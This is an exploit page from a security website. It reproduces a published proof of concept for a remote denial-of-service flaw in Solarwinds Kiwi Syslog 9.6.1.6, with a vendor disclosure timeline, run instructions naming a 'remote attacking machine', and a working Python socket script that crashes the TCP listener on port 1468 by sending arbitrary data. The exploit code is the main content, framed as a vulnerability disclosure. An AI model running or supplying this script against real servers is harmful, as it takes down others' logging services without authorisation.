首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service
来源:https://networkfilter.blogspot.com 作者:Kaddouch 发布时间:2017-08-03  
# Exploit Title: Solarwinds Kiwi Syslog 9.6.1.6 - Remote Denial of Service (Type Mismatch)
# Date: 26/05/2017
# Exploit Author: Guillaume Kaddouch
#   Twitter: @gkweb76
#   Blog: https://networkfilter.blogspot.com
#   GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.solarwinds.com/
# Software Link: http://downloads.solarwinds.com/solarwinds/Release/Kiwi/Syslog/Kiwi-Syslog-Server-9.6.1-Eval.zip
# Version: 9.6.1.6
# Tested on: Windows 7 SP1 Family x64 (FR) and Windows 8.1 Pro x64
# Category: DoS
 
"""
Disclosure Timeline:
--------------------
2017-05-20: Vulnerability discovered
2017-05-26: Vendor contacted
2017-05-31: Vendor answered (technical support)
2017-05-31: Vendor contacted (no answer)
2017-08-01: Exploit published
 
 
Description :
-------------
A remote Denial of Service exists in Kiwi Syslog 9.6.1.6 in the TCP listener.
Apparently any data sent to it make it crash because of a Type Mismatch error.
The syslog TCP listener is disabled by default.
 
 
Instructions:
-------------
- Starts Kiwi Syslog, and enable the TCP listener in the settings, default port is 1468.
- Run this exploit locally or from your remote attacking machine.
"""
 
#!/usr/bin/python
import socket
 
host    = "10.0.0.56"
port    = 1468
 
buffer  = "crash please?"
 
try:
        print "[*] Connecting to %s:%d" % (host, port)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
 
        print "[*] Sending buffer... (%d bytes)" % len(buffer)
        s.send(buffer)
        s.close()
 
        print "[*] Done."
except:
        print "[-] Error connecting"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nitro Pro PDF Reader 11.0.3.17
·Hashicorp vagrant-vmware-fusio
·Microsoft Windows LNK Shortcut
·SMBLoris Denial Of Service
·Advantech SUSIAccess <= 3.0 -
·DNSTracer 1.9 - Buffer Overflo
·Advantech SUSIAccess <= 3.0 -
·Microsoft Windows - LNK Shortc
·DiskBoss Enterprise 8.2.14 - B
·Microsoft Windows 7 SP1 x86 -
·Jenkins < 1.650 - Java Deseria
·Synology Photo Station 6.7.3-3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved